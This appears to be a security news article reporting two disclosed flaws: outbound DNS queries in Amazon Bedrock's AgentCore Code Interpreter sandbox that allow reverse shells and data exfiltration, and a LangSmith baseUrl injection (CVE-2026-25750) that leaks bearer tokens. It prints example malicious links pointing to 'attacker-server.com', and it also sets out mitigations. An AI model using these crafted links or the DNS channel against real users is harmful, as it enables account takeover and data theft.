Abstract image representing AI security threats with network connections and data flowing, symbolizing vulnerabilities in platforms like Amazon Bedrock and LangSmith.
Uncategorized

Unmasking AI’s Achilles’ Heel: Critical Flaws in Amazon Bedrock and LangSmith Expose Data to Attackers

Share
Share
Pinterest Hidden

The burgeoning field of artificial intelligence is revolutionizing industries, yet its rapid expansion is not without significant security challenges. Recent disclosures by cybersecurity researchers have cast a spotlight on critical vulnerabilities within prominent AI platforms, specifically Amazon Bedrock and LangSmith. These flaws, ranging from unexpected network access to sophisticated account takeover mechanisms, underscore the urgent need for robust security practices in the evolving AI ecosystem.

Amazon Bedrock: When “No Network Access” Isn’t Enough

Amazon Bedrock’s AgentCore Code Interpreter, designed to provide secure, isolated sandbox environments for AI agents, has been found to harbor a significant loophole. Cybersecurity firm BeyondTrust revealed that despite configurations explicitly stating “no network access,” the service’s sandbox mode permits outbound Domain Name System (DNS) queries. This seemingly innocuous allowance opens a Pandora’s Box for threat actors.

Exploiting the DNS Blind Spot

BeyondTrust’s report details how an attacker can weaponize these outbound DNS queries. By establishing a bidirectional communication channel, an adversary could:

  • Obtain interactive reverse shells, granting them direct control over the sandbox environment.
  • Exfiltrate sensitive data through DNS queries, particularly if the assigned IAM role has overprivileged access to AWS resources like S3 buckets.
  • Perform remote command execution (RCE) by feeding additional payloads to the Code Interpreter, prompting it to poll a DNS command-and-control (C2) server for commands and return results via DNS subdomain queries.

The vulnerability, which currently lacks a CVE identifier but carries a CVSS score of 7.5, highlights how easily network isolation guarantees can be undermined by overlooked functionalities. As Kinnaird McQuade, chief security architect at BeyondTrust, emphasized, this behavior allows “threat actors to establish command-and-control channels and data exfiltration over DNS in certain scenarios, bypassing the expected network isolation controls.”

Amazon’s Stance and Mitigation Strategies

Following responsible disclosure in September 2025, Amazon classified this behavior as “intended functionality” rather than a defect. They recommend that customers requiring complete network isolation utilize VPC mode instead of sandbox mode for AgentCore Code Interpreter instances. Additionally, the tech giant advises implementing a DNS firewall to meticulously filter outbound DNS traffic.

Security experts echo these recommendations. Jason Soroko, senior fellow at Sectigo, urged administrators to “inventory all active AgentCore Code Interpreter instances and immediately migrate those handling critical data from Sandbox mode to VPC mode.” He further stressed the importance of rigorous auditing of IAM roles, enforcing the principle of least privilege to minimize potential damage from any compromise.

LangSmith: A High-Severity Account Takeover Threat

Adding to the concerns in the AI security landscape, Miggo Security uncovered a high-severity flaw in LangSmith, an AI observability platform. This vulnerability (CVE-2026-25750, CVSS score: 8.5) exposed users to token theft and potential account takeover, affecting both self-hosted and cloud deployments.

The Peril of URL Parameter Injection

The core of the LangSmith flaw lies in a lack of validation on the baseUrl parameter, leading to URL parameter injection. An attacker could craft a malicious link that, when clicked by a signed-in user, would transmit their bearer token, user ID, and workspace ID to a server controlled by the attacker. Examples provided include:

  • Cloud: smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
  • Self-hosted: /studio/?baseUrl=https://attacker-server.com

Successful exploitation could grant unauthorized access to an AI’s trace history, potentially exposing sensitive internal data such as SQL queries, CRM customer records, or proprietary source code. Miggo researchers Liad Eliyahu and Eliana Vuijsje warned, “A logged-in LangSmith user could be compromised merely by accessing an attacker-controlled site or by clicking a malicious link.”

Lessons for AI Observability

This LangSmith vulnerability serves as a stark reminder that AI observability platforms are rapidly becoming critical infrastructure. As these tools prioritize developer flexibility and rapid iteration, security guardrails can sometimes be inadvertently bypassed. The risk is amplified by the deep access AI agents often have to internal systems, making them attractive targets for exploitation.

The Imperative of Proactive AI Security

These recent disclosures highlight a crucial truth: as AI systems become more integrated and powerful, their attack surface expands dramatically. The vulnerabilities in Amazon Bedrock and LangSmith are not isolated incidents but rather symptomatic of the broader challenges in securing complex AI environments. Developers, administrators, and security teams must adopt a proactive, defense-in-depth approach, prioritizing secure configurations, least privilege principles, continuous auditing, and rapid patching to safeguard the integrity and confidentiality of AI-driven operations.


For more details, visit our website.

Source: Link

Share

Leave a comment

Leave a Reply

Your email address will not be published. Required fields are marked *